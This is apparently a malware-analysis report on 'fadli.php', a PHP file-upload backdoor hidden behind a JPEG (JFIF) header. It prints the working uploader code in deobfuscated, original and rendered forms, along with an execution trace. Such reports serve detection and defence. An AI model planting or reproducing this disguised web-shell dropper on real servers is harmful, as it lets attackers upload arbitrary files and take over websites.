PHP Malware Analysis

fadli.php

md5: 84959e3315eb04daadfcddcf3244d0b2

Jump to: 

Screenshot
Attributes
Files

Input

Deobfuscated PHP code
���JFIF��<?php 
echo "<br><b>Fadly Uploader<br></b>";
if ($_POST) {
    if (@copy($_FILES["0"]["tmp_name"], $_FILES["0"]["name"])) {
        echo "Y";
    } else {
        echo "N";
    }
} else {
    echo "<form method=post enctype=multipart/form-data><input type=file name=0><input name=0 type=submit value=Go!>";
}
?>��C




��C		

����!������	����?�1�`��
Execution traces
data/traces/84959e3315eb04daadfcddcf3244d0b2_trace-1676256303.2552.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:45:29.152974]
1	0	1	0.000162	393512
1	3	0	0.000205	396104	{main}	1		/var/www/html/uploads/fadli.php	0	0
1	3	1	0.000222	396104
			0.000247	314224
TRACE END   [2023-02-13 00:45:29.153086]


Generated HTML code
<html><head></head><body>����JFIF��<!--? echo "<br--><b>Fadly Uploader<br></b>"; if($_POST){if(@copy($_FILES["0"]["tmp_name"],$_FILES["0"]["name"])){echo"Y";}else{echo"N";}}else{echo"<form method="post" enctype="multipart/form-data"><input type="file" name="0"><input name="0" type="submit" value="Go!">";}?&gt;��C




��C		

����!������	����?�1�`��</form></body></html>
Original PHP code
���JFIF��<? echo "<br><b>Fadly Uploader<br></b>"; if($_POST){if(@copy($_FILES["0"]["tmp_name"],$_FILES["0"]["name"])){echo"Y";}else{echo"N";}}else{echo"<form method=post enctype=multipart/form-data><input type=file name=0><input name=0 type=submit value=Go!>";}?>��C




��C		

����!������	����?�1�`��